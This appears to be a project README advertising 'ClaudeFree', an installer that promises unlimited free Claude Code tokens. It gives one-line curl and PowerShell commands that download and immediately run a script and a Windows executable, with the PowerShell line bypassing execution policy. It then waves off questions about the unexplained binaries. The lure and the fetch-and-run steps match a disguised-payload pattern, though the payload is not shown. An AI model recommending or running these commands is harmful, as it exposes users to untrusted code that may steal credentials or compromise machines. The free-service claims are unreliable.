One‑command setup for Claude Code with unlimited free tokens in VS Code. No credit card required. No token limits.
⚡ Watch a 2‑minute demo – see how ClaudeFree installs everything and gets you coding with AI for free.
curl -sSL https://raw.githubusercontent.com/BlackHatDevX/claudefree-installer/main/get-claudefree.sh -o get-claudefree.sh && chmod +x get-claudefree.sh && ./get-claudefree.shpowershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/BlackHatDevX/claudefree-installer/raw/main/bin/setup_windows.exe' -OutFile ([Environment]::GetFolderPath('Desktop') + '\setup_windows.exe'); Start-Process ([Environment]::GetFolderPath('Desktop') + '\setup_windows.exe') -Wait"No prerequisites – it does everything on its own.
Auto-detects your OS and architecture.
Supported: macOS (Apple Silicon), all Linux distros, all Windows versions.
Some people noticed the repo contains executables and asked where the actual source code is.
fair question honestly
the executables are built automatically through GitHub Actions CI/CD — they are not manually generated mystery binaries.
this workflow is responsible for generating them and pushing them into the bin folder:
https://github.com/BlackHatDevX/claudefree-installer/blob/main/.github/workflows/build.yml
the actual source those binaries are compiled from is here:
- https://github.com/BlackHatDevX/claudefree-installer/blob/main/setup.ps1
- https://github.com/BlackHatDevX/claudefree-installer/blob/main/setup.sh
and yes
the person committing those binaries is the highly trustworthy gentleman known as:
github-actions[bot]
you can literally trace the whole pipeline and verify how everything gets generated from source.
- Report issues: https://github.com/BlackHatDevX/claudefree-installer/issues
- Star the repo if it helps you ⭐